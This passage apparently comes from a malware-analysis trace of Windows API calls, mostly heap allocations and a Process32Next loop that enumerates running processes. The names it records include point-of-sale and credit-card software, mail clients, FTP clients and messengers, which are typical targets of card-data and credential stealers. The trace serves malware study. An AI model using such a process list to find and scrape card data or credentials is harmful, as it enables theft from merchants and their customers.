[0110.406] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.406] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.406] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f20 | out: hHeap=0x29a0000) returned 1 [0110.406] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0110.408] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.408] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ee0 [0110.408] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.408] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.408] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ee0 | out: hHeap=0x29a0000) returned 1 [0110.408] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.408] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0110.409] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.409] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e40 [0110.409] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6968 [0110.409] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.409] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.409] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1020, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0110.411] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.411] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970da0 [0110.411] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6918 [0110.411] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.411] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.411] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0110.412] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6858 [0110.412] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ca0 [0110.412] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6888 [0110.413] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.413] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.413] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x99a) returned 0x29a7980 [0110.413] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a7310 | out: hHeap=0x29a0000) returned 1 [0110.413] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0110.414] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.414] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970b80 [0110.414] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6838 [0110.414] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0110.414] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b80 | out: hHeap=0x29a0000) returned 1 [0110.414] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.414] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0110.416] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6838 [0110.416] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c60 [0110.416] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6988 [0110.416] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.416] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c60 | out: hHeap=0x29a0000) returned 1 [0110.416] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0110.417] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6868 [0110.417] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d00 [0110.417] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6998 [0110.417] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.417] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.417] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0110.419] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.419] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970da0 [0110.419] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6868 [0110.419] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.419] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.419] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.419] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0110.421] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.421] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c40 [0110.421] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69a8 [0110.421] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.421] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.421] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1084, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0110.422] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6838 [0110.422] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970bc0 [0110.422] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6868 [0110.422] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.422] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970bc0 | out: hHeap=0x29a0000) returned 1 [0110.422] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0110.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68a8 [0110.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970de0 [0110.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6978 [0110.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.424] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970de0 | out: hHeap=0x29a0000) returned 1 [0110.424] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0110.424] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0110.425] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68b8 [0110.425] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970b60 [0110.425] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6898 [0110.425] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.425] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0110.425] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.425] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0110.426] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.426] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d20 [0110.426] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68b8 [0110.426] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970650 [0110.426] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.427] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0110.428] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6928 [0110.428] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ec0 [0110.428] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.428] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.428] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ec0 | out: hHeap=0x29a0000) returned 1 [0110.428] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0110.429] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6828 [0110.429] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970b60 [0110.430] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.430] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0110.430] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0110.430] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0110.431] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.431] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970de0 [0110.431] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69d8 [0110.431] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0110.431] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970de0 | out: hHeap=0x29a0000) returned 1 [0110.431] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0110.432] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6918 [0110.432] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ba0 [0110.432] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69c8 [0110.432] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.432] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0110.433] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0110.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6978 [0110.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ba0 [0110.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970470 [0110.437] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0110.437] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0110.438] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69b8 [0110.438] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ce0 [0110.438] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6858 [0110.438] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970600 [0110.439] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ce0 | out: hHeap=0x29a0000) returned 1 [0110.439] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1100, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0110.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c40 [0110.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6918 [0110.440] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.440] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.440] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0110.441] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.441] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d20 [0110.441] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.441] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970470 [0110.441] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.441] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x111c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0110.443] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6898 [0110.443] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970bc0 [0110.443] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.443] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0110.443] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970bc0 | out: hHeap=0x29a0000) returned 1 [0110.443] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0110.444] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6858 [0110.444] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ec0 [0110.444] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6988 [0110.444] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.444] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ec0 | out: hHeap=0x29a0000) returned 1 [0110.444] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0110.445] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.446] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970f00 [0110.446] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.446] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0110.446] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f00 | out: hHeap=0x29a0000) returned 1 [0110.446] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0110.447] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6928 [0110.447] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c40 [0110.447] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6828 [0110.447] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970510 [0110.447] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.447] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0110.449] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69c8 [0110.449] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d00 [0110.449] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68c8 [0110.449] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0110.449] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.449] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0110.451] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6968 [0110.451] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970da0 [0110.451] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6998 [0110.451] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.451] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.451] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0110.452] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6948 [0110.452] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e40 [0110.452] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6928 [0110.452] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.452] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.452] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.452] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0110.453] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6888 [0110.453] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ec0 [0110.453] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.453] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.453] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ec0 | out: hHeap=0x29a0000) returned 1 [0110.453] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.454] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0110.455] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69d8 [0110.455] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c20 [0110.455] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.455] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970650 [0110.455] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970650 | out: hHeap=0x29a0000) returned 1 [0110.455] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c20 | out: hHeap=0x29a0000) returned 1 [0110.455] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, 